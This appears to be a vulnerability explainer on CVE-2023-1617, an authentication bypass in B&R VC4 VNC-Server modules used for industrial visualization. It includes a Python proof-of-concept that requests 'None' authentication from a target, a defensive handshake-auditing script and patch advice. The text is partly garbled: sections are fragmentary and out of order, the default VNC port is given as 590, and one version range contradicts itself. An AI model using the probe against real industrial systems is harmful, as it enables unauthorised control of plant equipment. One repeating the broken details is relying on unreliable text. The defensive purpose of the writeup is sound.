Summary:  
CVE-2023-1617 is an “Improper Authentication” security flaw in B&R Industrial Automation’s VC4 VNC-Server modules. In plain English, an attacker can connect to critical industrial control interfaces without needing a password if this bug is present and exposed to the network. This exposure puts production lines, utilities, and sensitive visualizations at serious risk of compromise.

In this article, we break down what this vulnerability is, how it’s exploited, who’s at risk, and how to fix the problem.

Explaining the Vulnerability

B&R VC4 (Visualization Core 4) is a platform used in industrial environments to control and monitor machines through a visual interface. Many installations use the built-in VNC-Server modules so that technicians, operators, or applications can remotely connect to these graphic panels.

CVE-2023-1617 is about improper authentication in these VNC-Server modules. That means an attacker can sometimes skip the required password and access visualization or control features directly.

Vulnerable Products:

- B&R VC4: versions from 3.* (through 3.96.7), 4.* (through 4.06.7), 4.1* (through 4.16.3), 4.2* (through 4.26.8), 4.3* (through 4.34.6), 4.4* (through 4.45.1), 4.5* (through 4.45.3), 4.7* (through 4.72.9).

Attack Surface:

- Any network where the VC4 VNC-Server is reachable by attackers (corporate LAN, remote connections, or exposed to the wider internet).

Critical: The impact depends on what functions are available via the visualization—an attacker could monitor, change settings, or even start/stop equipment.

How the Attack Works: A Walkthrough

Under normal conditions, anyone connecting to a VNC-Server should authenticate with a password. But due to CVE-2023-1617, a programming mistake allows attackers to trick the server into skipping password checks.

The attacker gains access to the visualization environment—no password required.

This may happen, for example, because the server fails to enforce password checks if a client sends specific protocol packets or values.

Example Exploit Using Python

Let’s say there’s a VNC-Server listening at 10.10.10.10:590.

A basic proof-of-concept exploit might look something like this (for illustration only):

```python
import socket

HOST = '10.10.10.10'
PORT = 590

# Open a TCP connection to the VNC-Server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

# Grab the VNC protocol version banner
banner = s.recv(1024)
print("[+] VNC Banner: ", banner)

# Send a crafted authentication handshake
# (Older/default VNC uses 'No Authentication' type: 1)
s.sendall(b'\x01\x01')  # Only "None" authentication

# If server responds as if authentication succeeded, vulnerability is present
response = s.recv(1024)
if response and response[0] == 0:  # 0 indicates "OK" in RFB handshake
    print("[+] Auth bypass successful! Server allows connection without password.")
else:
    print("[-] Auth required or handshake failed.")

s.close()
```

Note: Real-world attackers may use advanced VNC tools or scripts to exploit the flaw. This code shows the general idea of sending protocol messages to select 'no authentication' even if a password should be required.
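From the defender's side, the same pattern can be looked for in recorded traffic. The following is an added example (not part of the original article and not B&R code) that audits a recorded RFB 3.8 handshake and flags sessions that ended in "OK" without a password exchange. The byte streams are constructed samples and the framing assumes standard RFB 3.8; the exact mechanics of CVE-2023-1617 are not stated on this page.

```python
import struct

SEC_NONE, SEC_VNC_AUTH = 1, 2          # RFB security-type numbers
HELLO = b"RFB 003.008\n"               # 12-byte ProtocolVersion message

def parse_server_hello(data):
    """Return the security types an RFB 3.8 server offered."""
    if not data.startswith(HELLO) or len(data) < 13:
        raise ValueError("not an RFB 3.8 server stream")
    count = data[12]
    types = list(data[13:13 + count])
    if len(types) != count:
        raise ValueError("truncated security-type list")
    return types

def audit_session(server, client):
    """Flag handshakes that ended in OK without a password exchange."""
    offered = parse_server_hello(server)
    findings = []
    if SEC_NONE in offered:
        findings.append("server-offers-none")
    if not client.startswith(HELLO) or len(client) < 13:
        return findings                 # client never selected a type
    chosen = client[12]
    rest = server[13 + len(offered):]
    if chosen == SEC_VNC_AUTH:
        rest = rest[16:]                # skip the 16-byte challenge
    # SecurityResult is a big-endian u32; 0 means OK
    ok = len(rest) >= 4 and struct.unpack(">I", rest[:4])[0] == 0
    if ok and chosen not in offered:
        findings.append("unoffered-type-accepted")
    if ok and chosen == SEC_NONE:
        findings.append("session-without-password")
    return findings

# Constructed sample streams (server bytes, client bytes), not real captures
SAMPLES = {
    "password login": (HELLO + b"\x01\x02" + bytes(16) + bytes(4),
                       HELLO + b"\x02" + bytes(16)),
    "rejected": (HELLO + b"\x01\x02" + b"\x00\x00\x00\x01", HELLO + b"\x01"),
    "suspicious": (HELLO + b"\x01\x02" + bytes(4), HELLO + b"\x01"),
    "open server": (HELLO + b"\x01\x01" + bytes(4), HELLO + b"\x01"),
}

if __name__ == "__main__":
    for name, (srv, cli) in SAMPLES.items():
        print(f"{name:15} {audit_session(srv, cli) or 'ok'}")
```

Any finding on a panel that is supposed to require a password is worth investigating, whether it points to this flaw or to a server configured without authentication.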

Who Is Affected?

Check your VC4 version!

4.7* up to 4.72.9

Use the vendor toolboxes and runtime installer identifiers to check your version.

Stage further attacks (ransomware, sabotage, etc.)

If you rely on the VC4 visualization for anything important, you must treat this as a critical vulnerability.

Official References

- B&R Security Advisory (BR-2023-003)
- Siemens/B&R Security Notification (CVE-2023-1617)
- NIST National Vulnerability Database entry for CVE-2023-1617

Update to a patched version

- B&R has released updates for affected versions. Check the official advisory and apply the latest available service packs.

Use firewall rules to block VNC ports (default is 590) from the corporate and public networks.

3. Add Extra Authentication/Auditing

In Summary

CVE-2023-1617 is a serious, easy-to-exploit bug in B&R VC4 VNC-Server modules that lets attackers sidestep passwords and access industrial machine control screens. If you use these B&R products, treat this as critical—patch immediately and shut off unnecessary network access.

Timeline

Published on: 04/14/2023 12:15:00 UTC
Last modified on: 04/24/2023 13:21:00 UTC